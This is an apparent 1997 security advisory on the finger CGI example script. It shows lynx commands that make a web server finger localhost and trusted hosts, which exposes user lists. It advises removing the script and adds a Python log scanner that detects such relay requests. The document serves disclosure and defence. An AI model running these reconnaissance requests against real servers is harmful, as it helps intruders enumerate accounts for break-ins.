cpio.02.97-02-25.cgi-finger
01dd430130e32c24a3fa4f90160c9d55
************** Corinne Posse Security Notice **************
Issue Number 2: 970225
************** http://corinne.mac.edu/posse **************
**** User Security and Safety -- possible breach ****
Systems Affected:
Any system running any WWW server which includes the example CGI program
"finger".
finger, the standard Unix command used to look up users on a system, has
been deemed a security hole by some sites and in some cases shut off.
Other variations of finger have been altered so that a user can control
exactly what information about his/her login is shared on the local
machine and over the wire. In other instances, tcpwrappers are used so
that only trusted systems on a LAN can finger other machines. Having the
CGI program "finger" installed can breach security in all these instances.
Finger a site on the net, out of the blue.
Example:
[user@mybox] finger @host.i.want.to.own.com
/////////////////////////////////////////////////
*
* WARNING: Your finger attempt from user@myhost
* has been recorded in our logs.
* Any more finger attempts from your host, and
* we will consider those actions an attack on
* our host. We will prosecute anyone we feel is
* intruding onto our network.
*
/////////////////////////////////////////////////
[user@mybox] lynx http://host.i.want.to.own.com/cgi-bin/finger?@localhost
[localhost.i.want.to.own.com]
Login Name Tty Idle Login Time Office Office Phone
lip Larry I. Peters qf - Feb 19 15:01
jack Jack Daniels pd 23:40 Feb 18 14:44
jdobman J. Doberman p1 3 Feb 19 12:32 Room 101
jdobman J. Doberman q1 2:48 Feb 9 15:57 Room 101
red R. Earl Davies *q5 1:26 Feb 19 08:43
With that one CGI program, an entire network's security has been violated.
Imagine that host.i.want.to.own.com has a machine specifically for
processing orders. Knowing a username on that machine makes it a lot
easier for a potential hacker to get in. If software such as tcpwrappers
is in use on the LAN, chances are it will be configured so that local
users can see who is logged in where.
[user@mybox] lynx http://host.i.want.to.own.com/cgi-bin/finger?@trustedhost
[trustedhost]
Login Name Tty Idle Login Time Office Office Phone
lip Larry I. Peters q1 - Feb 19 15:01
jack Jack Daniels p0 1:40 Feb 18 14:44
Now, an entire network has had a security breach, not just one system.
Most people have no real use for /cgi-bin/finger; the easiest way to take
care of this problem is to remove the script.
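Before removing the script, a site can check whether it has already been
used as a relay. The following is an added example, not part of the
original notice: it scans web server access-log lines for requests to
/cgi-bin/finger and reports which clients had the server finger a host on
their behalf. It assumes the server writes Common Log Format; the sample
log lines and addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed format (Common Log Format):
#   host ident user [time] "METHOD url PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed sample lines (not taken from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Feb/1997:15:02:11 -0600] "GET /cgi-bin/finger?@localhost HTTP/1.0" 200 412
192.0.2.10 - - [19/Feb/1997:15:03:40 -0600] "GET /cgi-bin/finger?%40trustedhost HTTP/1.0" 200 233
198.51.100.7 - - [19/Feb/1997:15:05:02 -0600] "GET /cgi-bin/finger?jack HTTP/1.0" 200 120
198.51.100.7 - - [19/Feb/1997:15:06:00 -0600] "GET /index.html HTTP/1.0" 200 2048
203.0.113.5 - - [19/Feb/1997:15:07:00 -0600] "GET /cgi-bin/finger HTTP/1.0" 404 0
"""

def finger_cgi_hits(log_text, script="/cgi-bin/finger"):
    """Return {client: [(target, status), ...]} for requests to the finger CGI.

    target is the URL-decoded query string, so "%40host" and "@host"
    are reported the same way.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # not a parseable request line
        client, _method, url, status = m.groups()
        path, _, query = url.partition("?")
        if unquote(path) != script:
            continue
        hits[client].append((unquote(query), int(status)))
    return dict(hits)

def relayed_lookups(hits):
    """Keep successful requests whose target names a host (@host or user@host)."""
    out = {}
    for client, reqs in hits.items():
        targets = [t for t, status in reqs if "@" in t and status == 200]
        if targets:
            out[client] = targets
    return out

if __name__ == "__main__":
    for client, targets in relayed_lookups(finger_cgi_hits(SAMPLE_LOG)).items():
        print(client, "->", ", ".join(targets))
```

A 404 for /cgi-bin/finger, as in the last sample line, indicates the script
is absent on that server and is still worth noting as a probe.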
[Concept by: Person unknown]
[Written by: Jack O'Reilly, jack0@corinne.mac.edu]
[Rehashed: Jonathan Katz, jkatz@corinne.mac.edu]